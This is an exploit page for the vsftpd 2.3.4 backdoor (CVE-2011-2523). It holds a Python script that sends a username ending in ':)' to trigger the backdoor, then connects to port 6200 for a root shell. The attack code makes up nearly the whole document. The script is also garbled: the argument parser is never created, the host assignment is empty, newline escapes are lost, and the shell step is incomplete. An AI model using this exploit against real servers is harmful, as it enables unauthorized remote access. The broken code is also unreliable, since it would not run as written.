Authored by HerculesRD

vsftpd version 2.3.4 backdoor remote command execution exploit.

advisories | CVE-2011-2523

# Exploit Title: vsftpd 2.3.4 - Backdoor Command Execution
# Date: 9-04-2021
# Exploit Author: HerculesRD
# Software Link:
# Version: vsftpd 2.3.4
# Tested on: debian
# CVE : CVE-2011-2523


from telnetlib import Telnet
import argparse
from signal import signal, SIGINT
from sys import exit

def handler(signal_received, frame):
# Handle any cleanup here
print(' [+]Exiting...')

signal(SIGINT, handler)
parser.add_argument("host", help="input the address of the vulnerable host", type=str)
args = parser.parse_args()
host =
portFTP = 21 #if necessary edit this line

user="USER nergal:)"
password="PASS pass"

tn=Telnet(host, portFTP)
tn.read_until(b"(vsFTPd 2.3.4)") #if necessary, edit this line
tn.write(user.encode('ascii') + b"n")
tn.read_until(b"password.") #if necessary, edit this line
tn.write(password.encode('ascii') + b"n")

tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')